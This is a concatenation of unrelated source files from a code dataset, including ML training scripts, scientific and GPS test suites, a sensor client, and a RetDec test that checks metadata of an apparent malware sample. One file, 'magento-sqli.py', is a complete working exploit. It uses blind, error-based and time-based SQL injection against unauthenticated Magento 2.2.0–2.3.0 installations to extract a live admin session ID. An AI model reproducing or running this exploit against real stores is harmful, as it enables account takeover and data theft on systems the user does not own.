for i in range(0, dp):
start_point = self.par2Dev[(i,j,k)];
end_point = self.par2Dev[((i + 1) % dp,j,k)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.data_intra = False;
#Across all wafers, across all nodes, find maximum inter and intra node degree
def findMaxDegree(self):
max_interNodeDegree = 0
max_intraNodeDegree = 0
for wid in range(0, self.num_wafers):
for cid in range(0, self.num_nodes_per_wafer):
nid = self.node_id((wid,cid));
interNodeDegree = 0
intraNodeDegree = 0
for i in range(0, self.tot_nodes):
if (self.adj[nid][i] == 1):
intraNodeDegree = intraNodeDegree + 1
elif (self.adj[nid][i] == 2):
interNodeDegree = interNodeDegree + 1
if (interNodeDegree > max_interNodeDegree):
max_interNodeDegree = interNodeDegree
if (intraNodeDegree > max_intraNodeDegree):
max_intraNodeDegree = intraNodeDegree
return max_interNodeDegree, max_intraNodeDegree
def get_fractions(self):
return self.inter_frac, self.intra_frac
#get P2P bandwidth between data shards
def getDataThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.data_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between kernel shards
def getKernelThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.kernel_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between layer shards
def getLayerThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.layer_intra
else (inter_bw, inter_lat))
| 2.375 | 2 |
tools/fileinfo/features/visual-basic-parser/test.py | stepanek-m/retdec-regression-tests | 0 | 12760981 | from regression_tests import *
# https://github.com/avast-tl/retdec/issues/138
# Test for proper Visual Basic metadata parsing
class Test1(Test):
settings = TestSettings(
tool='fileinfo',
input='3e7126c600eb3d73c9b470aa98f2a416',
args='--verbose --json'
)
def test_visual_basic_presented(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['visualBasicInfo']['backupLanguageDLL'], '*')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['isPCode'], 'yes')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLL'], 'VB6DE.DLL')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLLPrimaryLCID'], 'German - Germany')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLLSecondaryLCID'], 'English - United States')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectDescription'], 'Projekt1')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectExeName'], 'my_st0re_loader_____')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectName'], 'muschmusch')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectPath'], 'C:\\Users\\Tix\\Desktop\\Sell_Tools\\iProtect\\load\\asdasd.vbp')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectPrimaryLCID'], 'English - United States')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectSecondaryLCID'], 'German - Austria')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibCLSID'], 'AB656C18-7E7D-2A48-90D0-CC26EBE49DE4')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibLCID'], 'Unspecified')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibMajorVersion'], '1')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibMinorVersion'], '0')
def test_visual_basic_extern_table(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['crc32'], '4647fd66')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['md5'], '038528f5da1ca95d66de9ffb558a8fad')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['sha256'], '8903e14d38862749270803180fc2240bce4610e28b2e4f4bfdaec55a6cfaa3ff')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][0]['apiName'], 'ARgopzWRvwdj')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][0]['moduleName'], 'netapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][1]['apiName'], 'PYZXczGNsFE')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][1]['moduleName'], 'netapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][2]['apiName'], 'HMxqxbooEHKCbqjT')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][2]['moduleName'], 'mapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][3]['apiName'], 'eiIwtnFCZvUZW')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][3]['moduleName'], 'mapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][4]['apiName'], 'CallWindowProcW')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][4]['moduleName'], 'UsEr32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][5]['apiName'], 'pNfrfdXpmJsDJFRi')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][5]['moduleName'], 'netapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][6]['apiName'], 'KnSCymHxoCMv')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][6]['moduleName'], 'netapi32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][7]['apiName'], 'zVWgpkOdwQje')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][7]['moduleName'], 'shell32')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][8]['apiName'], 'ylMihJrIuyYyKDWTq')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][8]['moduleName'], 'version.dll')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][9]['apiName'], 'BegNhmukPYZXczGN')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][9]['moduleName'], 'mapi32')
def test_visual_basic_object_table(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['guid'], '005CD394-A073-944E-8831-0A6EFC7D3AF0')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['crc32'], '0b86b7f1')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['md5'], 'f6c85535feafadb74306afc874c516a0')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['sha256'], 'ae05250c967d1f55105322454ada56db6990bd74a41a2cc63ce4e2f458a85616')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['name'], 'acnaAA')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][0], 'RunPE')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][1], 'Invoke')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][2], 'sDecryptName')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][3], 'InjPath')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][4], 'nand')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][5], 'xori')
# Test for proper COM Visual Basic metadata parsing
class Test2(Test):
settings = TestSettings(
tool='fileinfo',
input='c4affaea94863009d90668c9d86291864cd6027d798a20085b5110f6473450b7',
args='--verbose --json'
)
def test_visual_basic_com_data_presented(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectCLSID'], '13A84C25-CDF1-F24D-9338-CEF08CAAF469')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectEventsCLSID'], '3490B97E-F7E7-8847-8A6F-97AB39FC9C97')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectInterfaceCLSID'], '1A2ADBEC-0944-C944-A046-F535D14B4E10')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectName'], 'usrReverseRelay')
self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectType'], 'ActiveXUserControl')
| 2.1875 | 2 |
scripts/plain_models/cifar_resnet/train_pytorch.py | microsoft/archai | 344 | 12760982 | <reponame>microsoft/archai
import argparse
import math
from typing import List, Mapping, Optional, Tuple, Any
import os
import logging
import numpy as np
import time
import torch
from torch import nn
from torch.optim.optimizer import Optimizer
from torch.optim.lr_scheduler import _LRScheduler
from torch.nn.modules.loss import _Loss
from torch.utils.data import DataLoader
import torchvision
import torchvision.transforms as transforms
import yaml
from archai.common import utils
from archai import cifar10_models
def train(epochs, train_dl, val_dal, net, device, crit, optim,
sched, sched_on_epoch, half, quiet, grad_clip:float) -> List[Mapping]:
train_acc, test_acc = 0.0, 0.0
metrics = []
for epoch in range(epochs):
lr = optim.param_groups[0]['lr']
train_acc, loss = train_epoch(epoch, net, train_dl, device, crit, optim,
sched, sched_on_epoch, half, grad_clip)
val_acc = test(net, val_dal, device,
half) if val_dal is not None else math.nan
metrics.append({'val_top1': val_acc, 'train_top1': train_acc, 'lr': lr,
'epoch': epoch, 'train_loss': loss})
if not quiet:
logging.info(f'train_epoch={epoch}, val_top1={val_acc},'
f' train_top1={train_acc}, lr={lr:.4g}')
return metrics
def optim_sched_orig(net, epochs):
lr, momentum, weight_decay = 0.1, 0.9, 1.0e-4
optim = torch.optim.SGD(net.parameters(),
lr, momentum=momentum, weight_decay=weight_decay)
logging.info(f'lr={lr}, momentum={momentum}, weight_decay={weight_decay}')
sched = torch.optim.lr_scheduler.MultiStepLR(optim,
milestones=[100, 150, 200, 400, 600]) # resnet original paper
sched_on_epoch = True
logging.info(f'sched_on_epoch={sched_on_epoch}, sched={str(sched)}')
return optim, sched, sched_on_epoch
def optim_sched_cosine(net, epochs):
lr, momentum, weight_decay = 0.025, 0.9, 1.0e-4
optim = torch.optim.SGD(net.parameters(),
lr, momentum=momentum, weight_decay=weight_decay)
logging.info(f'lr={lr}, momentum={momentum}, weight_decay={weight_decay}')
sched = torch.optim.lr_scheduler.CosineAnnealingLR(optim, epochs)
sched_on_epoch = True
logging.info(f'sched_on_epoch={sched_on_epoch}, sched={str(sched)}')
return optim, sched, sched_on_epoch
def get_data(datadir: str, train_batch_size=128, test_batch_size=4096,
cutout=0, train_num_workers=-1, test_num_workers=-1,
val_percent=10.0)\
-> Tuple[DataLoader, Optional[DataLoader], DataLoader]:
if utils.is_debugging():
train_num_workers = test_num_workers = 0
logging.info('debugger=true, num_workers=0')
if train_num_workers <= -1:
train_num_workers = torch.cuda.device_count()*4
if test_num_workers <= -1:
test_num_workers = torch.cuda.device_count()*4
train_transform = cifar10_transform(aug=True, cutout=cutout)
trainset = torchvision.datasets.CIFAR10(root=datadir, train=True,
download=True, transform=train_transform)
val_len = int(len(trainset) * val_percent / 100.0)
train_len = len(trainset) - val_len
valset = None
if val_len:
trainset, valset = torch.utils.data.random_split(
trainset, [train_len, val_len])
train_dl = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size,
shuffle=True, num_workers=train_num_workers, pin_memory=True)
if valset is not None:
val_dl = torch.utils.data.DataLoader(valset, batch_size=test_batch_size,
shuffle=False, num_workers=test_num_workers, pin_memory=True)
else:
val_dl = None
test_transform = cifar10_transform(aug=False, cutout=0)
testset = torchvision.datasets.CIFAR10(root=datadir, train=False,
download=True, transform=test_transform)
test_dl = torch.utils.data.DataLoader(testset, batch_size=test_batch_size,
shuffle=False, num_workers=test_num_workers, pin_memory=True)
logging.info(
f'train_len={train_len}, val_len={val_len}, test_len={len(testset)}')
return train_dl, val_dl, test_dl
def train_epoch(epoch, net, train_dl, device, crit, optim,
sched, sched_on_epoch, half, grad_clip:float) -> Tuple[float, float]:
correct, total, loss_total = 0, 0, 0.0
net.train()
for batch_idx, (inputs, targets) in enumerate(train_dl):
inputs = inputs.to(device, non_blocking=True)
targets = targets.to(device, non_blocking=True)
if half:
inputs = inputs.half()
outputs, loss = train_step(net, crit, optim, sched, sched_on_epoch,
inputs, targets, grad_clip)
loss_total += loss
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
if sched and sched_on_epoch:
sched.step()
return 100.0*correct/total, loss_total
def train_step(net: nn.Module,
crit: _Loss, optim: Optimizer, sched: _LRScheduler, sched_on_epoch: bool,
inputs: torch.Tensor, targets: torch.Tensor, grad_clip:float) -> Tuple[torch.Tensor, float]:
outputs = net(inputs)
loss = crit(outputs, targets)
optim.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(net.parameters(), grad_clip)
optim.step()
if sched and not sched_on_epoch:
sched.step()
return outputs, loss.item()
def test(net, test_dl, device, half) -> float:
correct, total = 0, 0
net.eval()
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(test_dl):
inputs = inputs.to(device, non_blocking=False)
targets = targets.to(device)
if half:
inputs = inputs.half()
outputs = net(inputs)
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
return 100.0*correct/total
def param_size(model: torch.nn.Module) -> int:
"""count all parameters excluding auxiliary"""
return sum(v.numel() for name, v in model.named_parameters()
if "auxiliary" not in name)
def cifar10_transform(aug: bool, cutout=0):
MEAN = [0.49139968, 0.48215827, 0.44653124]
STD = [0.24703233, 0.24348505, 0.26158768]
transf = [
transforms.ToTensor(),
transforms.Normalize(MEAN, STD)
]
if aug:
aug_transf = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()
]
transf = aug_transf + transf
if cutout > 0: # must be after normalization
transf += [CutoutDefault(cutout)]
return transforms.Compose(transf)
class CutoutDefault:
"""
Reference : https://github.com/quark0/darts/blob/master/cnn/utils.py
"""
def __init__(self, length):
self.length = length
def __call__(self, img):
h, w = img.size(1), img.size(2)
mask = np.ones((h, w), np.float32)
y = np.random.randint(h)
x = np.random.randint(w)
y1 = np.clip(y - self.length // 2, 0, h)
y2 = np.clip(y + self.length // 2, 0, h)
x1 = np.clip(x - self.length // 2, 0, w)
x2 = np.clip(x + self.length // 2, 0, w)
mask[y1: y2, x1: x2] = 0.
mask = torch.from_numpy(mask)
mask = mask.expand_as(img)
img *= mask
return img
def log_metrics(expdir: str, filename: str, metrics, test_acc: float, args) -> None:
print('filename:', f'test_acc: {test_acc}', metrics[-1])
results = [
('test_acc', test_acc),
('val_acc', metrics[-1]['val_top1']),
('epochs', args.epochs),
('train_batch_size', args.train_batch_size),
('test_batch_size', args.test_batch_size),
('model_name', args.model_name),
('exp_name', args.experiment_name),
('exp_desc', args.experiment_description),
('seed', args.seed),
('devices', utils.cuda_device_names()),
('half', args.half),
('cutout', args.cutout),
('train_acc', metrics[-1]['train_top1']),
('loader_workers', args.loader_workers),
('date', str(time.time())),
]
utils.append_csv_file(os.path.join(expdir, f'{filename}.tsv'), results)
with open(os.path.join(expdir, f'{filename}.yaml'), 'w') as f:
yaml.dump(metrics, f)
def create_crit(device, half):
crit = nn.CrossEntropyLoss().to(device)
if half:
crit.half()
return crit
def create_model(model_name, device, half) -> nn.Module:
model_class = getattr(cifar10_models, model_name)
net = model_class()
logging.info(f'param_size_m={param_size(net):.1e}')
net = net.to(device)
if half:
net.half()
return net
def main():
parser = argparse.ArgumentParser(description='Pytorch cifar training')
parser.add_argument('--experiment-name', '-n', default='train_pytorch')
parser.add_argument('--experiment-description', '-d',
default='Train cifar usin pure PyTorch code')
parser.add_argument('--epochs', '-e', type=int, default=1)
parser.add_argument('--model-name', '-m', default='resnet34')
parser.add_argument('--device', default='',
help='"cuda" or "cpu" or "" in which case use cuda if available')
parser.add_argument('--train-batch-size', '-b', type=int, default=128)
parser.add_argument('--test-batch-size', type=int, default=4096)
parser.add_argument('--seed', '-s', type=float, default=42)
parser.add_argument('--half', type=lambda x: x.lower() == 'true',
nargs='?', const=True, default=False)
parser.add_argument('--cutout', type=int, default=0)
parser.add_argument('--grad-clip', type=float, default=5.0)
parser.add_argument('--datadir', default='',
help='where to find dataset files, default is ~/torchvision_data_dir')
parser.add_argument('--outdir', default='',
help='where to put results, default is ~/logdir')
parser.add_argument('--loader-workers', type=int, default=-1,
help='number of thread/workers for data loader (-1 means auto)')
args = parser.parse_args()
if not args.datadir:
args.datadir = os.environ.get('PT_DATA_DIR', '') or '~/dataroot'
if not args.outdir:
args.outdir = os.environ.get('PT_OUTPUT_DIR', '')
if not args.outdir:
args.outdir = os.path.join(
'~/logdir', 'cifar_testbed', args.experiment_name)
expdir = utils.full_path(args.outdir)
os.makedirs(expdir, exist_ok=True)
utils.setup_cuda(args.seed)
datadir = utils.full_path(args.datadir)
os.makedirs(datadir, exist_ok=True)
utils.create_logger(filepath=os.path.join(expdir, 'logs.log'))
# log config for reference
logging.info(
f'exp_name="{args.experiment_name}", exp_desc="{args.experiment_description}"')
logging.info(
f'model_name="{args.model_name}", seed={args.seed}, epochs={args.epochs}')
logging.info(f'half={args.half}, cutout={args.cutout}')
logging.info(f'datadir="{datadir}"')
logging.info(f'expdir="{expdir}"')
logging.info(f'train_batch_size={args.train_batch_size}')
if args.device:
device = torch.device(args.device)
else:
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# load data just before train start so any errors so far is not delayed
train_dl, val_dl, test_dl = get_data(datadir=datadir,
train_batch_size=args.train_batch_size, test_batch_size=args.test_batch_size,
train_num_workers=args.loader_workers, test_num_workers=args.loader_workers,
cutout=args.cutout)
epochs = args.epochs
net = create_model(args.model_name, device, args.half)
crit = create_crit(device, args.half)
optim, sched, sched_on_epoch = optim_sched_orig(net, epochs)
train_metrics = train(epochs, train_dl, val_dl, net, device, crit, optim,
sched, sched_on_epoch, args.half, False, grad_clip=args.grad_clip)
test_acc = test(net, test_dl, device, args.half)
log_metrics(expdir, 'train_metrics', train_metrics, test_acc, args)
if __name__ == '__main__':
main()
| 2.046875 | 2 |
connectsensor/tank.py | masaccio/kingspan-connect-sensor | 1 | 12760983 | <filename>connectsensor/tank.py
from zeep.helpers import serialize_object
import pandas as pd
import sqlite3
import ssl
import sys
class DBError(Exception):
pass
class Tank:
def __init__(self, client, tank_info):
self._client = client
self._tank_info = tank_info
def level(self):
response = self._client.get_latest_level(self._tank_info["SignalmanNo"])
self._tank_info_items = response["TankInfo"]["APITankInfoItem"]
level_data = response["Level"]
return dict(serialize_object(level_data))
def _lookup_tank_info_item(self, item_name):
if not hasattr(self, "_tank_info_items"):
self.level()
for item in self._tank_info_items:
if item["Name"] == item_name:
return item["Value"]
return None
def serial_number(self):
return self._lookup_tank_info_item("Serial No")
def model(self):
return self._lookup_tank_info_item("Model")
def name(self):
return self._lookup_tank_info_item("Tank Name")
def capacity(self):
return self._lookup_tank_info_item("Tank Capacity(L)")
def history(self):
history_data = self._client.get_history(self._tank_info["SignalmanNo"])
df = pd.DataFrame(serialize_object(history_data))
df = df[["ReadingDate", "LevelPercentage", "LevelLitres"]]
df.columns = ["reading_date", "level_percent", "level_litres"]
return df
def cached_history(self, cache_db, update=False):
try:
conn = sqlite3.connect(cache_db)
cur = conn.cursor()
except Error as e:
raise DBError(f"{cache_db}: connection failed") from e
if _table_exists(cur):
query = "SELECT * FROM history;"
old_history = pd.read_sql_query(query, conn, parse_dates=["reading_date"])
new_history = self.history()
history = old_history.append(new_history).drop_duplicates()
if update:
history.to_sql("history", conn, if_exists="replace", index=False)
cur.close()
conn.close()
return history
def _table_exists(cur):
query = "SELECT name FROM sqlite_master WHERE type='table' AND name='history'"
try:
cur.execute(query)
rows = cur.fetchall()
except Error as e:
raise DBError("Failed to check status of history table") from e
return len(rows) > 0
| 2.59375 | 3 |
scripts/mapping-test.py | mwinding/play | 0 | 12760984 | # %%
# test out geopy
import os
os.chdir(os.path.dirname(os.getcwd())) # make directory one step up the current directory
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent='<PASSWORD>_agent')
location = geolocator.geocode('175 5th Avenue NYC')
print(location.address)
print((location.latitude, location.longitude))
#print(location.raw)
# %%
# test out python maps
import folium
m = folium.Map(location=[location.latitude, location.longitude], zoom_start=13)
m.save('outputs/test-map.html')
# %%
| 2.890625 | 3 |
gym_forest/envs/__init__.py | kmckiern/gym-forest | 2 | 12760985 | from gym_forest.envs.gym_forest import ForestDiscreteEnv
| 1.125 | 1 |
exploit/webapp/cms/magento-sqli.py | prismaB/exxer | 6 | 12760986 | #!/usr/bin/env python3
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi
# <NAME>
# 2019-03-22
#
# SOURCE & SINK
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.
# If your target runs Magento < 2.2.0, you need to find another source.
#
# SQL INJECTION
# The exploit can easily be modified to obtain other stuff from the DB, for
# instance admin/user password hashes.
#
import requests
import string
import binascii
import re
import random
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
sid = sqli.get_most_recent_session()
except ExploitError as e:
print('Error: %s' % e)
def random_string(n=8):
return ''.join(random.choice(string.ascii_letters) for _ in range(n))
class ExploitError(Exception):
pass
class Browser:
"""Basic browser functionality along w/ URLs and payloads.
"""
PROXY = None
def __init__(self, URL):
self.URL = URL
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {
'http': self.PROXY,
'https': self.PROXY,
}
class SQLInjection(Browser):
"""SQL injection stuff.
"""
def encode(self, string):
return '0x' + binascii.b2a_hex(string.encode()).decode()
def find_test_method(self):
"""Tries to inject using an error-based technique, or falls back to timebased.
"""
for test_method in (self.test_error, self.test_timebased):
if test_method('123=123') and not test_method('123=124'):
self.test = test_method
break
else:
raise ExploitError('Test SQL injections failed, not vulnerable ?')
def test_timebased(self, condition):
"""Runs a test. A valid condition results in a sleep of 1 second.
"""
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.elapsed.total_seconds() > 1
def test_error(self, condition):
"""Runs a test. An invalid condition results in an SQL error.
"""
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
if r.status_code not in (200, 400):
raise ExploitError(
'SQL injection does not yield a correct HTTP response'
)
return r.status_code == 400
def word(self, name, sql, size=None, charset=None):
"""Dichotomically obtains a value.
"""
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'
full = ''
check = False
if size is None:
# Yeah whatever
size_size = self.word(
name,
'LENGTH(LENGTH(%s))' % sql,
size=1,
charset=string.digits
)
size = self.word(
name,
'LENGTH(%s)' % sql,
size=int(size_size),
charset=string.digits
)
size = int(size)
print("%s: %s" % (name, full), end='\r')
for p in range(size):
c = charset
while len(c) > 1:
middle = len(c) // 2
h0, h1 = c[:middle], c[middle:]
condition = pattern % (sql, p+1, self.encode(h0))
c = h1 if self.test(condition) else h0
full += c
print("%s: %s" % (name, full), end='\r')
print(' ' * len("%s: %s" % (name, full)), end='\r')
return full
def get_most_recent_session(self):
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the
backend.
"""
# This is the default admin session timeout
session_timeout = 900
query = (
'SELECT %%s FROM admin_user_session '
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'
) % session_timeout
# Check if a session is available
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))
if not available:
raise ExploitError('No session is available')
print('An admin session is available !')
# Fetch it
sid = self.word(
'Session ID',
query % 'session_id',
charset=string.ascii_lowercase + string.digits,
size=26
)
print('Session ID: %s' % sid)
return sid
run(sys.argv[1])
| 2.140625 | 2 |
calliope/test/test_io.py | sjpfenninger/calliope | 1 | 12760987 | import os
import tempfile
import numpy as np
import pytest
import calliope
def verify_solution_integrity(model_solution, solution_from_disk, tempdir):
# Check whether the two are the same
np.allclose(model_solution['e_cap'], solution_from_disk['e_cap'])
# Check that config AttrDict has been deserialized
assert(solution_from_disk.attrs['config_run'].output.path == tempdir)
class TestSave:
@pytest.fixture(scope='module')
def model(self):
model = calliope.Model()
model.run()
return model
def test_save_netcdf(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('netcdf')
# Try reading solution back in
sol_file = os.path.join(tempdir, 'solution.nc')
solution_from_disk = calliope.read.read_netcdf(sol_file)
solution_from_disk.close() # so that temp dir can be deleted
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
def test_save_csv(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('csv')
# Try reading solution back in
solution_from_disk = calliope.read.read_csv(tempdir)
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
| 2.34375 | 2 |
pyiacsun/atlas/Delbouille73.py | aasensio/pyiacsun | 5 | 12760988 | <reponame>aasensio/pyiacsun
# <EMAIL>
def Delbouille73(ini, endi, atlasdir=None):
"""
Extract spectral data from the original disk-center
intensity atlas recorded at the Jungfraujoch Observatory:
Delbouille, Neven, Roland (1973)
Wavelength range: 3000 - 10.000 A
Wavelength step (visible): 0.002 A
CALL: atlas,xlam = Delbouille73(ini = waveIni ,endi = waveEndi)
Downloaded from:
http://bass2000.obspm.fr/solar_spect.php
Args:
ini (int): Initial wavelength
endi (int): Final wavelength
atlasdir (string, optional): Atlas directory
"""
import numpy as np
# Atlas directory
if atlasdir is None:
atlasdir = str(__file__).split('/')
sdir = '/'.join(atlasdir[0:-2])+'/data'
else:
sdir = atlasdir
file0 = np.load(sdir + '/Delbouille73.npy')
lmbda0 = np.arange(3000., 10000., 0.002)
iniI = np.argmin(abs(ini - lmbda0))
endiI = np.argmin(abs(endi - lmbda0))
lmbda = lmbda0[iniI:endiI]
varFinal = file0[iniI:endiI]
return [varFinal / 1e4, lmbda]
if __name__ == '__main__':
import matplotlib.pyplot as plt
[atlas, xlam] = Delbouille73(ini=6300, endi=6303)
plt.plot(xlam, atlas / max(atlas))
plt.title('Delbouille73 Atlas')
plt.xlabel('Wavelength [A]')
plt.ylim(0., 1.)
plt.show()
| 2.640625 | 3 |
tests/test_gpsfun.py | vincentdavis/gpsfun | 0 | 12760989 | <filename>tests/test_gpsfun.py<gh_stars>0
#!/usr/bin/env python
"""Basic functional Tests for `gpsfun` package."""
import pytest
import unittest
from pathlib import Path
from gpsfun.readers import tcx, gpx, gpsbabel
from gpsfun.tracks import Track
from gpsfun.rallystyle import RallyResults
@pytest.fixture
def all_files():
parent_dir = Path(__file__).parent
p = parent_dir.joinpath('test_data').glob('**/*')
return [x for x in p if x.is_file() and x.name[:5] == 'test_']
def test_gpsbabel_basic(all_files):
for f in all_files:
if f.suffix in ['.tcx', '.gpx', '.fit']:
df = gpsbabel(str(f))
assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
{'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(f)}"
def test_gpsbabel_compressed(all_files):
files = [x for x in all_files if x.suffix in ['.gz', '.zip']]
for f in files:
df = gpsbabel(str(f))
assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
{'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(f)}"
def test_gpsbabel_stream(all_files):
files = [x for x in all_files if x.suffix in ['.tcx', '.gpx', '.fit']]
for f in files:
with open(f, 'rb') as f:
df = gpsbabel(f)
assert {'Latitude', 'Longitude', 'Date_Time'}.intersection(set(df.columns)) == \
{'Latitude', 'Longitude', 'Date_Time'}, f"failing file: {str(f)}"
def test_gpx_tracks(all_files):
"""
uses gpx not gpsbabel
"""
assert len(all_files) > 0
for f in all_files:
if f.suffix == '.gpx':
t = Track(df=gpx(f))
t.elevation()
assert t.avg_elevation != 0, f"failing file: {str(f)}"
t.distance()
assert t.total_distance > 0, f"failing file: {str(f)}"
t.time()
assert t.start_time < t.end_time, f"failing file: {str(f)}"
def test_tcx_tracks(all_files):
'''
uses tcx not gpsbabel
'''
for f in all_files:
if f.suffix == '.tcx':
t = Track(df=tcx(f))
t.elevation()
assert t.avg_elevation >= 0, f"failing file: {str(f)}"
t.distance()
assert t.total_distance > 0, f"failing file: {str(f)}"
t.time()
assert t.start_time < t.end_time, f"failing file: {str(f)}"
@pytest.fixture
def roubaix():
return [{'Segment_name':'Ride Start: lap 1',
'location': {'lat': 40.117348, 'lon': -105.258836},
'type_name': 'transport',
'type_args': {'timed': None}
},
{'Segment_name':'End lap 1, Refuel, ride to start',
'location': {'lat': 40.116263, 'lon': -105.257817},
'type_name': 'transport',
'type_args': {'timed': None},
},
{'Segment_name':'Race: Lap two',
'location': {'lat': 40.117348, 'lon': -105.258836},
'type_name': 'timed',
'type_args': None,
},
{'Segment_name':'Finish',
'location': {'lat': 40.116263, 'lon': -105.257817},
'type': 'end'
}
]
@pytest.fixture
